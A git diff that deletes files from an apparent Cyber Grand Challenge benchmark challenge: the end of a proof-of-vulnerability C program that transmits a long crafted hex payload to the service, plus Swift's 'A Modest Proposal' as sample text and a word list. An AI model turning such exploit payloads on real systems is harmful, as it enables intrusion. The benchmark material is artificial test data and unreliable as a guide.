"\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x31\x35\xff" - "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x31\x36\xff\x43" - "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x31\x37\xff\x43\x26" - "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x31\x38\xff\x43\x26\x46" - "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x31\x39\xff\x43\x26\x46\x38" - "\x09\x68\x65\x6c\x6c\x6f\x32\x33\x32\x30\xff\x43\x26\x46\x38\x09" - "\x68\x65\x6c\x6c\x6f\x32\x33\x32\x31\xff\x43\x26\x46\x38\x09\x68" - "\x65\x6c\x6c\x6f\x32\x33\x32\x32\xff\x43\x26\x46\x38\x09\x68\x65" - "\x6c\x6c\x6f\x32\x33\x32\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c" - "\x6c\x6f\x32\x33\x32\x34\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" - "\x6f\x32\x33\x32\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" - "\x32\x33\x32\x36\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" - "\x33\x32\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33" - "\x32\x38\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x32" - "\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x33\x30" - "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x33\x31\xff" - "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x33\x32\xff\x43" - "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x33\x33\xff\x43\x26" - "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x33\x34\xff\x43\x26\x46" - "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x33\x35\xff\x43\x26\x46\x38" - "\x09\x68\x65\x6c\x6c\x6f\x32\x33\x33\x36\xff\x43\x26\x46\x38\x09" - "\x68\x65\x6c\x6c\x6f\x32\x33\x33\x37\xff\x43\x26\x46\x38\x09\x68" - "\x65\x6c\x6c\x6f\x32\x33\x33\x38\xff\x43\x26\x46\x38\x09\x68\x65" - "\x6c\x6c\x6f\x32\x33\x33\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c" - "\x6c\x6f\x32\x33\x34\x30\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" - "\x6f\x32\x33\x34\x31\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" - "\x32\x33\x34\x32\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" - "\x33\x34\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33" - "\x34\x34\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x34" - "\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x34\x36" - "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x34\x37\xff" - "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x34\x38\xff\x43" - "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x34\x39\xff\x43\x26" - "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x35\x30\xff\x43\x26\x46" - "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x35\x31\xff\x43\x26\x46\x38" - "\x09\x68\x65\x6c\x6c\x6f\x32\x33\x35\x32\xff\x43\x26\x46\x38\x09" - "\x68\x65\x6c\x6c\x6f\x32\x33\x35\x33\xff\x43\x26\x46\x38\x09\x68" - "\x65\x6c\x6c\x6f\x32\x33\x35\x34\xff\x43\x26\x46\x38\x09\x68\x65" - "\x6c\x6c\x6f\x32\x33\x35\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c" - "\x6c\x6f\x32\x33\x35\x36\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" - "\x6f\x32\x33\x35\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" - "\x32\x33\x35\x38\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" - "\x33\x35\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33" - "\x36\x30\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36" - "\x31\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36\x32" - "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36\x33\xff" - "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36\x34\xff\x43" - "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36\x35\xff\x43\x26" - "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36\x36\xff\x43\x26\x46" - "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36\x37\xff\x43\x26\x46\x38" - "\x09\x68\x65\x6c\x6c\x6f\x32\x33\x36\x38\xff\x43\x26\x46\x38\x09" - "\x68\x65\x6c\x6c\x6f\x32\x33\x36\x39\xff\x43\x26\x46\x38\x09\x68" - "\x65\x6c\x6c\x6f\x32\x33\x37\x30\xff\x43\x26\x46\x38\x09\x68\x65" - "\x6c\x6c\x6f\x32\x33\x37\x31\xff\x43\x26\x46\x38\x09\x68\x65\x6c" - "\x6c\x6f\x32\x33\x37\x32\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" - "\x6f\x32\x33\x37\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" - "\x32\x33\x37\x34\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" - "\x33\x37\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33" - "\x37\x36\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x37" - "\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x37\x38" - "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x37\x39\xff" - "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x30\xff\x43" - "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x31\xff\x43\x26" - "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x32\xff\x43\x26\x46" - "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x33\xff\x43\x26\x46\x38" - "\x09\x68\x65\x6c\x6c\x6f\x32\x33\x38\x34\xff\x43\x26\x46\x38\x09" - "\x68\x65\x6c\x6c\x6f\x32\x33\x38\x35\xff\x43\x26\x46\x38\x09\x68" - "\x65\x6c\x6c\x6f\x32\x33\x38\x36\xff\x43\x26\x46\x38\x09\x68\x65" - "\x6c\x6c\x6f\x32\x33\x38\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c" - "\x6c\x6f\x32\x33\x38\x38\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" - "\x6f\x32\x33\x38\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" - "\x32\x33\x39\x30\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" - "\x33\x39\x31\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33" - "\x39\x32\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39" - "\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x34" - "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x35\xff" - "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x36\xff\x43" - "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x37\xff\x43\x26" - "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x38\xff\x43\x26\x46" - "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x33\x39\x39\xff\x43\x26\x46\x38" - "\x09\x68\x65\x6c\x6c\x6f\x32\x34\x30\x30\xff\x43\x26\x46\x38\x09" - "\x68\x65\x6c\x6c\x6f\x32\x34\x30\x31\xff\x43\x26\x46\x38\x09\x68" - "\x65\x6c\x6c\x6f\x32\x34\x30\x32\xff\x43\x26\x46\x38\x09\x68\x65" - "\x6c\x6c\x6f\x32\x34\x30\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c" - "\x6c\x6f\x32\x34\x30\x34\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" - "\x6f\x32\x34\x30\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" - "\x32\x34\x30\x36\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" - "\x34\x30\x37\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34" - "\x30\x38\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x30" - "\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x30" - "\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x31\xff" - "\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x32\xff\x43" - "\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x33\xff\x43\x26" - "\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x34\xff\x43\x26\x46" - "\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x35\xff\x43\x26\x46\x38" - "\x09\x68\x65\x6c\x6c\x6f\x32\x34\x31\x36\xff\x43\x26\x46\x38\x09" - "\x68\x65\x6c\x6c\x6f\x32\x34\x31\x37\xff\x43\x26\x46\x38\x09\x68" - "\x65\x6c\x6c\x6f\x32\x34\x31\x38\xff\x43\x26\x46\x38\x09\x68\x65" - "\x6c\x6c\x6f\x32\x34\x31\x39\xff\x43\x26\x46\x38\x09\x68\x65\x6c" - "\x6c\x6f\x32\x34\x32\x30\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c" - "\x6f\x32\x34\x32\x31\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f" - "\x32\x34\x32\x32\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32" - "\x34\x32\x33\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34" - "\x32\x34\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x32" - "\x35\xff\x43\x26\x46\x38\x09\x68\x65\x6c\x6c\x6f\x32\x34\x32\x36" - "\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84" - "\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84" - "\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\xa8\x84\x0a"; - static unsigned int write_00000_00000_len = 35343; - unsigned char *write_00000 = NULL; - unsigned int write_00000_len = 0; - write_00000 = cgc_append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); - if (write_00000_len > 0) { - cgc_transmit_all(1, write_00000, write_00000_len); - } - cgc_free(write_00000); - } while (0); - do { - unsigned char *read_00000; - unsigned int read_00000_len; - unsigned int read_00000_ptr = 0; - //**** length read - read_00000_len = 2500; - read_00000 = (unsigned char*)cgc_malloc(read_00000_len); - int read_00000_res = cgc_length_read(0, read_00000, read_00000_len); - if (read_00000_res) {} //silence unused variable warning - /* read match pcre: -[\x00\x01]* -*/ - static char read_00000_00000_regex[] = - "\x5b\x5c\x78\x30\x30\x5c\x78\x30\x31\x5d\x2a"; - static match_result read_00000_00000_match; - pcre *read_00000_00000_pcre = cgc_init_regex(read_00000_00000_regex); - if (read_00000_00000_pcre != NULL) { - int rc = cgc_regex_match(read_00000_00000_pcre, 0, read_00000 + read_00000_ptr, read_00000_len - read_00000_ptr, &read_00000_00000_match); - if (rc > 0) { - read_00000_ptr += read_00000_00000_match.match_end - read_00000_00000_match.match_start; - } - else { - //this is a pov so what does this even mean? - //why would we quit on failed match, just keep sending stuff. - } - pcre_free(read_00000_00000_pcre); - } - else { - //this is a pov so what does this even mean? - //why would we quit on failed regex compile, just keep sending stuff. - } - cgc_free(read_00000); - if (read_00000_ptr) {} //silence unused variable warning if any - } while (0); -} diff --git a/challenges/FUN/src/cgc_text.h b/challenges/FUN/src/cgc_text.h deleted file mode 100644 index 283793c08..000000000 --- a/challenges/FUN/src/cgc_text.h +++ /dev/null @@ -1,289 +0,0 @@ -const char cgc_text[] = "It is a melancholy object to those, who walk through this great town, " \ -"or travel in the country, when they see the streets, the roads and " \ -"cabbin-doors crowded with beggars of the female sex, followed by three, " \ -"four, or six children, all in rags, and importuning every passenger for " \ -"an alms. These mothers instead of being able to work for their honest " \ -"livelihood, are forced to employ all their time in stroling to beg " \ -"sustenance for their helpless infants who, as they grow up, either turn " \ -"thieves for want of work, or leave their dear native country, to fight " \ -"for the Pretender in Spain, or sell themselves to the Barbadoes. " \ -"I think it is agreed by all parties, that this prodigious number of " \ -"children in the arms, or on the backs, or at the heels of their mothers, " \ -"and frequently of their fathers, is in the present deplorable state of " \ -"the kingdom, a very great additional grievance; and therefore whoever " \ -"could find out a fair, cheap and easy method of making these children " \ -"sound and useful members of the common-wealth, would deserve so well of " \ -"the publick, as to have his statue set up for a preserver of the nation. " \ -"But my intention is very far from being confined to provide only for the " \ -"children of professed beggars: it is of a much greater extent, and shall " \ -"take in the whole number of infants at a certain age, who are born of " \ -"parents in effect as little able to support them, as those who demand " \ -"our charity in the streets. " \ -"As to my own part, having turned my thoughts for many years, upon this " \ -"important subject, and maturely weighed the several schemes of " \ -"our projectors, I have always found them grossly mistaken in their " \ -"computation. It is true, a child just dropt from its dam, may be " \ -"supported by her milk, for a solar year, with little other nourishment: " \ -"at most not above the value of two shillings, which the mother may " \ -"certainly get, or the value in scraps, by her lawful occupation of " \ -"begging; and it is exactly at one year old that I propose to provide for " \ -"them in such a manner, as, instead of being a charge upon their parents, " \ -"or the parish, or wanting food and raiment for the rest of their lives, " \ -"they shall, on the contrary, contribute to the feeding, and partly to " \ -"the cloathing of many thousands. " \ -"There is likewise another great advantage in my scheme, that it will " \ -"prevent those voluntary abortions, and that horrid practice of " \ -"women murdering their bastard children, alas! too frequent among us, " \ -"sacrificing the poor innocent babes, I doubt, more to avoid the expence " \ -"than the shame, which would move tears and pity in the most savage and " \ -"inhuman breast. " \ -"The number of souls in this kingdom being usually reckoned one million " \ -"and a half, of these I calculate there may be about two hundred thousand " \ -"couple whose wives are breeders; from which number I subtract thirty " \ -"thousand couple, who are able to maintain their own children, (although " \ -"I apprehend there cannot be so many, under the present distresses of " \ -"the kingdom) but this being granted, there will remain an hundred and " \ -"seventy thousand breeders. I again subtract fifty thousand, for those " \ -"women who miscarry, or whose children die by accident or disease within " \ -"the year. There only remain an hundred and twenty thousand children of " \ -"poor parents annually born. The question therefore is, How this number " \ -"shall be reared, and provided for? which, as I have already said, under " \ -"the present situation of affairs, is utterly impossible by all the " \ -"methods hitherto proposed. For we can neither employ them in handicraft " \ -"or agriculture; we neither build houses, (I mean in the country) nor " \ -"cultivate land: they can very seldom pick up a livelihood by stealing " \ -"till they arrive at six years old; except where they are of towardly " \ -"parts, although I confess they learn the rudiments much earlier; " \ -"during which time they can however be properly looked upon only as " \ -"probationers: As I have been informed by a principal gentleman in the " \ -"county of Cavan, who protested to me, that he never knew above one or " \ -"two instances under the age of six, even in a part of the kingdom so " \ -"renowned for the quickest proficiency in that art. " \ -"I am assured by our merchants, that a boy or a girl before twelve years " \ -"old, is no saleable commodity, and even when they come to this age, they " \ -"will not yield above three pounds, or three pounds and half a crown " \ -"at most, on the exchange; which cannot turn to account either to the " \ -"parents or kingdom, the charge of nutriments and rags having been at " \ -"least four times that value. " \ -"I shall now therefore humbly propose my own thoughts, which I hope will " \ -"not be liable to the least objection. " \ -"I have been assured by a very knowing American of my acquaintance in " \ -"London, that a young healthy child well nursed, is, at a year old, a " \ -"most delicious nourishing and wholesome food, whether stewed, roasted, " \ -"baked, or boiled; and I make no doubt that it will equally serve in a " \ -"fricasie, or a ragoust. " \ -"I do therefore humbly offer it to publick consideration, that of the " \ -"hundred and twenty thousand children, already computed, twenty thousand " \ -"may be reserved for breed, whereof only one fourth part to be males; " \ -"which is more than we allow to sheep, black cattle, or swine, and my " \ -"reason is, that these children are seldom the fruits of marriage, a " \ -"circumstance not much regarded by our savages, therefore, one male will " \ -"be sufficient to serve four females. That the remaining hundred thousand " \ -"may, at a year old, be offered in sale to the persons of quality and " \ -"fortune, through the kingdom, always advising the mother to let them " \ -"suck plentifully in the last month, so as to render them plump, and fat " \ -"for a good table. A child will make two dishes at an entertainment for " \ -"friends, and when the family dines alone, the fore or hind quarter will " \ -"make a reasonable dish, and seasoned with a little pepper or salt, will " \ -"be very good boiled on the fourth day, especially in winter. " \ -"I have reckoned upon a medium, that a child just born will weigh 12 " \ -"pounds, and in a solar year, if tolerably nursed, encreaseth to 28 " \ -"pounds. " \ -"I grant this food will be somewhat dear, and therefore very proper for " \ -"landlords, who, as they have already devoured most of the parents, seem " \ -"to have the best title to the children. " \ -"Infant's flesh will be in season throughout the year, but more plentiful " \ -"in March, and a little before and after; for we are told by a grave " \ -"author, an eminent French physician, that fish being a prolifick dyet, " \ -"there are more children born in Roman Catholick countries about nine " \ -"months after Lent, the markets will be more glutted than usual, because " \ -"the number of Popish infants, is at least three to one in this kingdom, " \ -"and therefore it will have one other collateral advantage, by lessening " \ -"the number of Papists among us. " \ -"I have already computed the charge of nursing a beggar's child (in which " \ -"list I reckon all cottagers, labourers, and four-fifths of the farmers) " \ -"to be about two shillings per annum, rags included; and I believe no " \ -"gentleman would repine to give ten shillings for the carcass of a good " \ -"fat child, which, as I have said, will make four dishes of excellent " \ -"nutritive meat, when he hath only some particular friend, or his " \ -"own family to dine with him. Thus the squire will learn to be a good " \ -"landlord, and grow popular among his tenants, the mother will have eight " \ -"shillings neat profit, and be fit for work till she produces another " \ -"child. " \ -"Those who are more thrifty (as I must confess the times require) may " \ -"flea the carcass; the skin of which, artificially dressed, will make " \ -"admirable gloves for ladies, and summer boots for fine gentlemen. " \ -"As to our City of Dublin, shambles may be appointed for this purpose, in " \ -"the most convenient parts of it, and butchers we may be assured will not " \ -"be wanting; although I rather recommend buying the children alive, and " \ -"dressing them hot from the knife, as we do roasting pigs. " \ -"A very worthy person, a true lover of his country, and whose virtues " \ -"I highly esteem, was lately pleased, in discoursing on this matter, to " \ -"offer a refinement upon my scheme. He said, that many gentlemen of this " \ -"kingdom, having of late destroyed their deer, he conceived that the " \ -"want of venison might be well supply'd by the bodies of young lads and " \ -"maidens, not exceeding fourteen years of age, nor under twelve; so great " \ -"a number of both sexes in every country being now ready to starve for " \ -"want of work and service: And these to be disposed of by their parents " \ -"if alive, or otherwise by their nearest relations. But with due " \ -"deference to so excellent a friend, and so deserving a patriot, I " \ -"cannot be altogether in his sentiments; for as to the males, my American " \ -"acquaintance assured me from frequent experience, that their flesh was " \ -"generally tough and lean, like that of our school-boys, by continual " \ -"exercise, and their taste disagreeable, and to fatten them would not " \ -"answer the charge. Then as to the females, it would, I think, with " \ -"humble submission, be a loss to the publick, because they soon would " \ -"become breeders themselves: And besides, it is not improbable that some " \ -"scrupulous people might be apt to censure such a practice, (although " \ -"indeed very unjustly) as a little bordering upon cruelty, which, I " \ -"confess, hath always been with me the strongest objection against any " \ -"project, how well soever intended. " \ -"But in order to justify my friend, he confessed, that this expedient " \ -"was put into his head by the famous Salmanaazor, a native of the island " \ -"Formosa, who came from thence to London, above twenty years ago, and in " \ -"conversation told my friend, that in his country, when any young person " \ -"happened to be put to death, the executioner sold the carcass to persons " \ -"of quality, as a prime dainty; and that, in his time, the body of a " \ -"plump girl of fifteen, who was crucified for an attempt to poison the " \ -"Emperor, was sold to his imperial majesty's prime minister of state, and " \ -"other great mandarins of the court in joints from the gibbet, at four " \ -"hundred crowns. Neither indeed can I deny, that if the same use were " \ -"made of several plump young girls in this town, who without one single " \ -"groat to their fortunes, cannot stir abroad without a chair, and appear " \ -"at a play-house and assemblies in foreign fineries which they never will " \ -"pay for; the kingdom would not be the worse. " \ -"Some persons of a desponding spirit are in great concern about that vast " \ -"number of poor people, who are aged, diseased, or maimed; and I have " \ -"been desired to employ my thoughts what course may be taken, to ease " \ -"the nation of so grievous an incumbrance. But I am not in the least pain " \ -"upon that matter, because it is very well known, that they are every day " \ -"dying, and rotting, by cold and famine, and filth, and vermin, as fast " \ -"as can be reasonably expected. And as to the young labourers, they " \ -"are now in almost as hopeful a condition. They cannot get work, and " \ -"consequently pine away from want of nourishment, to a degree, that if " \ -"at any time they are accidentally hired to common labour, they have not " \ -"strength to perform it, and thus the country and themselves are happily " \ -"delivered from the evils to come. " \ -"I have too long digressed, and therefore shall return to my subject. I " \ -"think the advantages by the proposal which I have made are obvious and " \ -"many, as well as of the highest importance. " \ -"For first, as I have already observed, it would greatly lessen the " \ -"number of Papists, with whom we are yearly over-run, being the principal " \ -"breeders of the nation, as well as our most dangerous enemies, and who " \ -"stay at home on purpose with a design to deliver the kingdom to the " \ -"Pretender, hoping to take their advantage by the absence of so many good " \ -"Protestants, who have chosen rather to leave their country, than stay at " \ -"home and pay tithes against their conscience to an episcopal curate. " \ -"Secondly, The poorer tenants will have something valuable of their own, " \ -"which by law may be made liable to a distress, and help to pay their " \ -"landlord's rent, their corn and cattle being already seized, and money a " \ -"thing unknown. " \ -"Thirdly, Whereas the maintainance of an hundred thousand children, " \ -"from two years old, and upwards, cannot be computed at less than " \ -"ten shillings a piece per annum, the nation's stock will be thereby " \ -"encreased fifty thousand pounds per annum, besides the profit of a " \ -"new dish, introduced to the tables of all gentlemen of fortune in the " \ -"kingdom, who have any refinement in taste. And the money will circulate " \ -"among our selves, the goods being entirely of our own growth and " \ -"manufacture. " \ -"Fourthly, The constant breeders, besides the gain of eight shillings " \ -"sterling per annum by the sale of their children, will be rid of the " \ -"charge of maintaining them after the first year. " \ -"Fifthly, This food would likewise bring great custom to taverns, " \ -"where the vintners will certainly be so prudent as to procure the best " \ -"receipts for dressing it to perfection; and consequently have their " \ -"houses frequented by all the fine gentlemen, who justly value themselves " \ -"upon their knowledge in good eating; and a skilful cook, who understands " \ -"how to oblige his guests, will contrive to make it as expensive as they " \ -"please. " \ -"Sixthly, This would be a great inducement to marriage, which all wise " \ -"nations have either encouraged by rewards, or enforced by laws and " \ -"penalties. It would encrease the care and tenderness of mothers towards " \ -"their children, when they were sure of a settlement for life to the " \ -"poor babes, provided in some sort by the publick, to their annual profit " \ -"instead of expence. We should soon see an honest emulation among the " \ -"married women, which of them could bring the fattest child to the " \ -"market. Men would become as fond of their wives, during the time of " \ -"their pregnancy, as they are now of their mares in foal, their cows in " \ -"calf, or sow when they are ready to farrow; nor offer to beat or kick " \ -"them (as is too frequent a practice) for fear of a miscarriage. " \ -"Many other advantages might be enumerated. For instance, the addition " \ -"of some thousand carcasses in our exportation of barrel'd beef: the " \ -"propagation of swine's flesh, and improvement in the art of making good " \ -"bacon, so much wanted among us by the great destruction of pigs, " \ -"too frequent at our tables; which are no way comparable in taste or " \ -"magnificence to a well grown, fat yearly child, which roasted whole will " \ -"make a considerable figure at a Lord Mayor's feast, or any other publick " \ -"entertainment. But this, and many others, I omit, being studious of " \ -"brevity. " \ -"Supposing that one thousand families in this city, would be constant " \ -"customers for infants flesh, besides others who might have it at merry " \ -"meetings, particularly at weddings and christenings, I compute that " \ -"Dublin would take off annually about twenty thousand carcasses; and the " \ -"rest of the kingdom (where probably they will be sold somewhat cheaper) " \ -"the remaining eighty thousand. " \ -"I can think of no one objection, that will possibly be raised against " \ -"this proposal, unless it should be urged, that the number of people will " \ -"be thereby much lessened in the kingdom. This I freely own, and 'twas " \ -"indeed one principal design in offering it to the world. I desire the " \ -"reader will observe, that I calculate my remedy for this one individual " \ -"Kingdom of Ireland, and for no other that ever was, is, or, I think, " \ -"ever can be upon Earth. Therefore let no man talk to me of other " \ -"expedients: Of taxing our absentees at five shillings a pound: Of using " \ -"neither cloaths, nor houshold furniture, except what is of our " \ -"own growth and manufacture: Of utterly rejecting the materials and " \ -"instruments that promote foreign luxury: Of curing the expensiveness of " \ -"pride, vanity, idleness, and gaming in our women: Of introducing a vein " \ -"of parsimony, prudence and temperance: Of learning to love our " \ -"country, wherein we differ even from Laplanders, and the inhabitants " \ -"of Topinamboo: Of quitting our animosities and factions, nor acting any " \ -"longer like the Jews, who were murdering one another at the very moment " \ -"their city was taken: Of being a little cautious not to sell our country " \ -"and consciences for nothing: Of teaching landlords to have at least one " \ -"degree of mercy towards their tenants. Lastly, of putting a spirit of " \ -"honesty, industry, and skill into our shop-keepers, who, if a resolution " \ -"could now be taken to buy only our native goods, would immediately unite " \ -"to cheat and exact upon us in the price, the measure, and the goodness, " \ -"nor could ever yet be brought to make one fair proposal of just dealing, " \ -"though often and earnestly invited to it. " \ -"Therefore I repeat, let no man talk to me of these and the like " \ -"expedients, 'till he hath at least some glympse of hope, that there will " \ -"ever be some hearty and sincere attempt to put them into practice. " \ -"But, as to my self, having been wearied out for many years with offering " \ -"vain, idle, visionary thoughts, and at length utterly despairing of " \ -"success, I fortunately fell upon this proposal, which, as it is wholly " \ -"new, so it hath something solid and real, of no expence and little " \ -"trouble, full in our own power, and whereby we can incur no danger " \ -"in disobliging England. For this kind of commodity will not bear " \ -"exportation, and flesh being of too tender a consistence, to admit a " \ -"long continuance in salt, although perhaps I could name a country, which " \ -"would be glad to eat up our whole nation without it. " \ -"After all, I am not so violently bent upon my own opinion, as to reject " \ -"any offer, proposed by wise men, which shall be found equally innocent, " \ -"cheap, easy, and effectual. But before something of that kind shall be " \ -"advanced in contradiction to my scheme, and offering a better, I desire " \ -"the author or authors will be pleased maturely to consider two points. " \ -"First, As things now stand, how they will be able to find food and " \ -"raiment for a hundred thousand useless mouths and backs. And secondly, " \ -"There being a round million of creatures in humane figure throughout " \ -"this kingdom, whose whole subsistence put into a common stock, would " \ -"leave them in debt two million of pounds sterling, adding those who are " \ -"beggars by profession, to the bulk of farmers, cottagers and labourers, " \ -"with their wives and children, who are beggars in effect; I desire " \ -"those politicians who dislike my overture, and may perhaps be so bold " \ -"to attempt an answer, that they will first ask the parents of these " \ -"mortals, whether they would not at this day think it a great happiness " \ -"to have been sold for food at a year old, in the manner I prescribe, and " \ -"thereby have avoided such a perpetual scene of misfortunes, as they have " \ -"since gone through, by the oppression of landlords, the impossibility of " \ -"paying rent without money or trade, the want of common sustenance, with " \ -"neither house nor cloaths to cover them from the inclemencies of the " \ -"weather, and the most inevitable prospect of intailing the like, or " \ -"greater miseries, upon their breed for ever. " \ -"I profess, in the sincerity of my heart, that I have not the least " \ -"personal interest in endeavouring to promote this necessary work, having " \ -"no other motive than the publick good of my country, by advancing " \ -"our trade, providing for infants, relieving the poor, and giving some " \ -"pleasure to the rich. I have no children, by which I can propose to " \ -"get a single penny; the youngest being nine years old, and my wife past " \ -"child-bearing. "; diff --git a/challenges/FUN/src/cgc_words_r.h b/challenges/FUN/src/cgc_words_r.h deleted file mode 100644 index ca8a00e7b..000000000 --- a/challenges/FUN/src/cgc_words_r.h +++ /dev/null @@ -1,11738 +0,0 @@ -static const char *words[12000] = { - "lighthearted", - "housebroken", - "crown princess", - "include", - "countenance", - "boozer", - "carve", - "cheesecloth", - "fanciful", - "butterfingers", - "ambitious", - "he'd", - "gutsy", - "local", - "fluidity", - "low-paid", - "fallacious", - "chilly", - "dirty", - "cutlery", - "empress", - "bigot", - "gulch", - "incessantly", - "exhaust", - "lotion", - "carnivore", - "bigamy", - "emerge", - "bikini", - "excitement", - "lose", - "Episcopal Church", - "fool", - "ambush", - "fare", - "fractionally", - "ethereal", - "gesticulate", - "epaulet", - "communicable", - "continuity", - "inoculation", - "excrete", - "contradictory", - "assignment", - "ecological", - "inflict", - "loyal", - "free will", - "educational", - "faculty", - "business administration", - "Europe", - "hang", - "lily", - "foliage", - "humanize", - "brief", - "grand piano", - "computation", - "camellia", - "disapprovingly", - "heartbreaking", - "litigation", - "algebra", - "C-section", - "ABC", - "heyday", - "grin", - "bedpan", - "fog", - "akin", - "long-range", - "at", - "clutches", - "delay", - "hen", - "godforsaken", - "disclose", - "backlash", - "duffel bag", - "biting", - "elevation", - "discord", - "gnat", - "effort", - "hot seat", - "creditable", - "croon", - "equator", - "dilute", - "duplicate", - "funeral director", - "apartheid", - "family values", - "abashed", - "footage", - "lost", - "detain", - "journalism", - "Caucasian", - "blot", - "hangers-on", - "intelligible", - "looter", - "arraignment", - "easygoing", - "aerodynamic", - "doesn't", - "guy", - "flub", - "dismissal", - "lucidity", - "informed", - "forgery", - "indifferently", - "hot tub", - "marinade", - "inequity", - "indelibly", - "limousine", - "imaginable", - "chicken pox", - "acquisition", - "delayed", - "hijacker", - "edible", - "expenses", - "he", - "dolly", - "big cheese", - "developing", - "glare", - "dissolve", - 